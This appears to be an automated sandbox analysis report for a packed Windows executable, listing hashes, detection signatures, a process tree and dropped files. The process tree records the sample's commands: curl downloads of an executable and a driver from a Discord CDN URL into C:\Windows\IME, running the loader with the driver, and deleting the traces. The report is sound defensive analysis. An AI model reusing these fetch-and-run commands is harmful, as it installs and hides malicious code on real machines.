Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/12/2023, 10:27

General

  • Target

    84dfe3e2c2c23431bf1016ea20d6c329.exe

  • Size

    5.4MB

  • MD5

    84dfe3e2c2c23431bf1016ea20d6c329

  • SHA1

    a550c42c27139a7b6342edefed46646847ef0e90

  • SHA256

    3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4

  • SHA512

    6a08f161325481c5ef1242ab3707935cdb24f54ec0b992a1a5fb459bea1be49ab68f949b578f39c3c5b61b0c834f03e82477171a1aec2a02a86bb3839825fac4

  • SSDEEP

    98304:UFKcieVSvNTwVaUSCBsZgw2PJ2Q9tv9aiayBgfBY1CXpmzL7J/C7dep4mh:UDObUSCZwmJ2Ud9paICOkobUep4W

Score
7/10

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
    "C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c Color C
      2⤵
      PID:4772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7fhtVRZEC6
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffcf0946f8,0x7fffcf094708,0x7fffcf094718
          4⤵
          PID:3312
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
          4⤵
          PID:4420
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2548
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                4⤵
                  PID:2844
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
          4⤵
          PID:788
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
          4⤵
          PID:3288
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
          4⤵
          PID:4212
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3596 /prefetch:8
          4⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          PID:3616
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4000 /prefetch:8
          4⤵
          PID:412
        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3164
        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
          4⤵
          PID:1688
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
          4⤵
          PID:1776
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
          4⤵
          PID:380
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
          4⤵
          PID:4852
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
          4⤵
          PID:2532
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,372406454507801531,5231337581874341088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2780 /prefetch:2
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4536
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
      2⤵
      PID:4940
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:3736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:2120
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
      2⤵
      PID:1176
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
      2⤵
      PID:1720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
      2⤵
      PID:5040
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:5040
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:3308
  • C:\Windows\system32\curl.exe
    curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
    1⤵
    • Drops file in Windows directory
    PID:1988
  • C:\Windows\system32\curl.exe
    curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
    1⤵
    • Drops file in Windows directory
    PID:4624

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    • Filesize
      152B
    • MD5
      1386433ecc349475d39fb1e4f9e149a0
    • SHA1
      f04f71ac77cb30f1d04fd16d42852322a8b2680f
    • SHA256
      a7c79320a37d3516823f533e0ca73ed54fc4cdade9999b9827d06ea9f8916bbc
    • SHA512
      fcd5449c58ead25955d01739929c42ffc89b9007bc2c8779c05271f2d053be66e05414c410738c35572ef31811aff908e7fe3dd7a9cef33c27acb308a420280e
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
    • Filesize
      2KB
    • MD5
      0f6976ad6d5540f1f51f0df6839d48c9
    • SHA1
      d5f7f1a5c8308766c23d4d07b443ceffae8b13be
    • SHA256
      a807bebf57431338d1d2e4ab939370aec25f17bf6fdb903335b69a2cffeb55f1
    • SHA512
      6799e3c695660c81b7bd30c91c97289a826967f75cec76e322b01c2105f825b5c0241038b7c35eed2dd09961bc83f96b965379a9e20f5d04b3abebbe643a4082
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
    • Filesize
      537B
    • MD5
      174d2805548b3042244d48d9917aecde
    • SHA1
      f01ed149e9dd669ec548e55ff9210e3693fe7ad9
    • SHA256
      e72fe1eef49f172b5b6f2aa423d6e77d54a86abc3d86a3765084abeca55e5ef7
    • SHA512
      50fd27d8f07417d786b3300a0ae27c1b1802f5bb0d9fbf9c32260d63604f1a68cc698836922258bed984d4961442419bceb533c0bd7dc67c88e28d993db5e345
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    • Filesize
      5KB
    • MD5
      cd7a481992bb3c6c6c91230ebe41719a
    • SHA1
      6f015adee0521bf04a0a1947d0b03b4c2e5602eb
    • SHA256
      833dfd26a6d489a70511c3f8c7b2a3892b5d564f4a713bef70ce8109cf7ee0df
    • SHA512
      79582828cbd9ab1183c5349f432421163d690f56f967eea3c6101a17becdd0e6b2e921229535bf231f1d258e7c3e3bb5c5dccd6523d9eb8d2f0e0909ff75174b
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    • Filesize
      5KB
    • MD5
      3a2e0c9dcc0cfd4506dfeb7380e9f8e1
    • SHA1
      46c09db0c959a43fe52e51d8ae0784f5790744d9
    • SHA256
      e40c399298236afe95b2f6d012f920086222d0fbc114e7efa567218cb4229c24
    • SHA512
      e987c6e7a2335e34a435abaacd4065e63bbdfa57c8ee6d56e3b8a0581f279a04375ae7c5b6b1c51068e9385d4d950231b4ef54d7eca00261ff78b33b3f2a255f
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
    • Filesize
      24KB
    • MD5
      e664066e3aa135f185ed1c194b9fa1f8
    • SHA1
      358ff3c6ad0580b8ae1e5ef2a89a4e597c2efdc5
    • SHA256
      86e595be48dbc768a52d7ea62116036c024093e1302aced8c29dd6a2d9935617
    • SHA512
      58710818b5f664006a5aa418da6c8cd3f709c2265bc161f81b9dfe6cdb8304fabaa4ce9deba419fe4281623feeeaa0321f481ae5855d347c6d8cf95968ee905e
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
    • Filesize
      16B
    • MD5
      6752a1d65b201c13b62ea44016eb221f
    • SHA1
      58ecf154d01a62233ed7fb494ace3c3d4ffce08b
    • SHA256
      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
    • SHA512
      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    • Filesize
      10KB
    • MD5
      574e914ae828133a9e2752b81f0fba77
    • SHA1
      040648b6303490ba437e36f9cea5d55cfa46b089
    • SHA256
      9277cf0627923c25e9d6a618e5aa8f68bd7919dcdade570496e4c6497cad754c
    • SHA512
      0c1fb4d014a7962b08b257287685130dc73c17aadd0191d3e958c001b206c0ca005bb08cde84389a9738a753775e657742d63a0184f2e29b1f011da708936e9b
  • C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
    • Filesize
      262B
    • MD5
      2a9323a6cbaff798e17c01be2f9b4b4e
    • SHA1
      f21da1dff74fa8a4fc700053352bb70d43d3d3ea
    • SHA256
      d89542d7df229de0447f183395234cf06adb621ac143567b1559e05d94d32d89
    • SHA512
      84eaaf174dfc83c7aac9182eb565ed10f70319bac3b25429b1d281b1a5d9787545d77dd924903845d2cd213d60ae016818e8fba3bbadd648b5fad38348285688
  • C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
    • Filesize
      229B
    • MD5
      3631fb192c457a8b79e24be447f130c2
    • SHA1
      d1e91dbc18a6cea9f3a70ba917b5d95cc64fb040
    • SHA256
      9729db4909f45672e4220a333f95ef8e5b8b1f17bdfb86fd5c3a6fd511d576c0
    • SHA512
      5cd5bf670f06f597322b03fac537c3082e8d0f13a81c47157353c10cbca34bc4a59a4b6ed35ae949b25250f175d423ea14a9f89f0bd9bd502ef3338328fb0415
  • memory/5048-1-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
    • Filesize
      9.3MB
  • memory/5048-291-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
    • Filesize
      9.3MB
  • memory/5048-2-0x00007FF65BED0000-0x00007FF65C829000-memory.dmp
    • Filesize
      9.3MB
  • memory/5048-0-0x00007FFFED310000-0x00007FFFED312000-memory.dmp
    • Filesize
      8KB